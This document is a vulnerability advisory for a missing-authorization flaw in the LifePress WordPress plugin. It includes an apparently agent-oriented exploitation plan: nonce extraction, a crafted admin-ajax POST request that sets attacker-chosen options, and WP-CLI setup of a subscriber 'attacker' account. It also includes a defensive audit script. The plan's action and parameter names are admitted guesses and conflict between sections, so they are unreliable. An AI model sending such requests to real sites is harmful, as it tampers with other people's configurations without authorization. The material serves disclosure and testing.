CVE-2026-24563

LifePress <= 2.2.1 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 2.2.2
Time to patch: 34d

Description

The LifePress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.2.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=2.2.1
Published: January 22, 2026
Last updated: February 24, 2026
Affected plugin: lifepress

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan outlines the steps to investigate and exploit a missing authorization vulnerability in the LifePress plugin (versions <= 2.2.1). Since source code was not provided, this plan focuses on identifying the specific vulnerable AJAX action and exploiting it to perform an unauthorized configuration change.


1. Vulnerability Summary

The LifePress plugin fails to implement proper capability checks (e.g., current_user_can( 'manage_options' )) in one or more of its AJAX handlers. While these handlers likely implement nonce verification to prevent CSRF, the lack of a capability check allows any authenticated user (including low-privileged Subscribers) to execute the function. This typically results in the ability to modify plugin settings or delete plugin-managed data.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Vulnerable Action: Likely lifepress_save_settings, lifepress_update_options, or lifepress_delete_post (inferred).
  • Payload Parameter: action, security (or nonce), and the specific data to be modified.
  • Authentication: Authenticated (Subscriber-level).
  • Preconditions: A valid nonce for the specific action must be obtained.

3. Code Flow (Inferred)

  1. Registration: The plugin registers an AJAX action for authenticated users via add_action( 'wp_ajax_...' ) in a file like includes/class-lifepress-admin.php or the main plugin file.
  2. Entry Point: When a request hits admin-ajax.php with the specified action, WordPress routes it to the plugin's callback function.
  3. Vulnerable Check: The callback function likely calls check_ajax_referer( 'some-nonce-action', 'security' ) but does not follow it with if ( ! current_user_can( 'manage_options' ) ) wp_die();.
  4. Sink: The function then proceeds to update database options using update_option() or deletes content using wp_delete_post().

4. Nonce Acquisition Strategy

To exploit the wp_ajax_ hook, a valid nonce is required. The execution agent must first identify the localization key used by the plugin.

  1. Identify Action and Nonce Key:
    Grep the plugin directory for the registration and localization:
    grep -r "wp_ajax_" .
    grep -r "wp_localize_script" .
    
  2. Locate the Hook:
    Identify which admin page or shortcode enqueues the script containing the nonce.
  3. Setup Page for Nonce Extraction:
    If the nonce is only loaded on admin pages, the Subscriber user might still be able to see it in the wp-admin dashboard or via a specific plugin page. If it's loaded via a shortcode:
    wp post create --post_type=page --post_status=publish --post_title="LifePress Test" --post_content="[lifepress_shortcode]"
    
  4. Extract via Browser:
    Navigate as the Subscriber user and extract the nonce:
    • Localization Object (Inferred): lp_settings_params or lifepress_vars
    • JS Key: nonce or security
    • Command: browser_eval("window.lp_settings_params?.nonce")

5. Exploitation Strategy

Once the action name and nonce are identified, the agent will perform an unauthorized setting update.

Target Action (Example): lifepress_save_settings
Required Parameters:

  • action: lifepress_save_settings (inferred)
  • security: [EXTRACTED_NONCE]
  • lp_option_name: lp_some_critical_setting
  • lp_option_value: attacker_value

HTTP Request (via http_request tool):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [SUBSCRIBER_COOKIES]

action=lifepress_save_settings&security=[NONCE]&setting_key=some_option&setting_value=malicious_val

6. Test Data Setup

  1. Install Plugin: Ensure LifePress version 2.2.1 is installed.
  2. Create User: Create a subscriber-level user.
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password
    
  3. Initial State: Identify an existing plugin option to modify.
    wp option get lp_settings
    

7. Expected Results

  • The admin-ajax.php request should return a 200 OK or a success JSON (e.g., {"success":true}).
  • The server should NOT return a 403 Forbidden or a -1 (which indicates nonce failure).
  • The targeted WordPress option in the wp_options table should be updated to the attacker-supplied value.

8. Verification Steps

After the HTTP request, verify the impact using WP-CLI:

# Check if the specific option was changed
wp option get lp_settings

# Or, if it's a metadata-based change
wp post get [POST_ID] --field=post_content

9. Alternative Approaches

If lifepress_save_settings is not the vulnerable action, the agent should:

  1. Grep for update_option: Search for functions that update options and are called within AJAX handlers.
    grep -rn "update_option" . --include="*.php"
    
  2. Audit AJAX Handlers: Systematically check every function registered to wp_ajax_ and look for the absence of current_user_can.
  3. Check REST API: If the plugin uses the REST API instead of AJAX, look for register_rest_route without a permission_callback or one that returns true.
    grep -rn "register_rest_route" . -A 5
    
    If a REST route is found with 'permission_callback' => '__return_true', this is a high-priority target.
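
For plugin maintainers and code reviewers, the audit in step 2 (and the nonce-only pattern from section 3) can be automated. The script below is an added example, not part of the original plan and not LifePress code; the PHP sample, its class, hook and option names are constructed for illustration.

```python
import re

# Constructed sample (not LifePress source): save() checks only the nonce, reset() is hardened.
SAMPLE_PHP = r"""<?php
class Demo_Admin {
    public function __construct() {
        add_action( 'wp_ajax_demo_save', array( $this, 'save' ) );
        add_action( 'wp_ajax_demo_reset', array( $this, 'reset' ) );
    }
    public function save() {   // nonce only: any logged-in user passes
        check_ajax_referer( 'demo-nonce', 'security' );
        update_option( 'demo_settings', $_POST['value'] );
    }
    public function reset() {
        check_ajax_referer( 'demo-nonce', 'security' );
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( null, 403 );
        }
        delete_option( 'demo_settings' );
    }
}
"""

HOOK_RE = re.compile(r"add_action\(\s*['\"]wp_ajax_(?!nopriv_)(\w+)['\"]\s*,\s*"
                     r"(?:(?:array\(|\[)\s*\$this\s*,\s*)?['\"](\w+)['\"]")

def function_body(src, name):
    """Return the brace-balanced body of PHP function `name`, or None if absent."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit(src):
    """Return (action, callback, has_nonce_check) for each authenticated
    wp_ajax_ handler (wp_ajax_nopriv_ is skipped) without current_user_can."""
    findings = []
    for m in HOOK_RE.finditer(src):
        action, cb = m.group(1), m.group(2)
        body = function_body(src, cb)
        if body is not None and "current_user_can" not in body:
            findings.append((action, cb, "check_ajax_referer" in body))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_PHP))
```

A handler that delegates its capability check to a helper function will show up as a false positive, so treat each finding as a prompt for manual review. The hardened `reset()` in the sample shows the shape of the fix: a `current_user_can()` check placed after the nonce check and before the sink.
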
Research Findings
Static analysis — not yet PoC-verified

Summary

The LifePress plugin for WordPress is vulnerable to unauthorized setting modification in versions up to and including 2.2.1. This is due to missing capability checks in AJAX handlers, allowing authenticated users with Subscriber-level access to perform administrative actions that should be restricted to administrators.

Exploit Outline

  1. Authenticate as a Subscriber-level user.
  2. Identify the target AJAX action (e.g., 'lifepress_save_settings') by auditing the plugin's wp_ajax hooks.
  3. Extract a valid security nonce from the WordPress admin or site front-end by looking for localized scripts (typically containing an object like 'lp_settings_params' or 'lifepress_vars').
  4. Submit a POST request to /wp-admin/admin-ajax.php including the 'action' parameter, the extracted nonce in the security/nonce field, and the malicious configuration data.
  5. Verify the unauthorized change by checking the plugin's settings via the WordPress dashboard or WP-CLI.
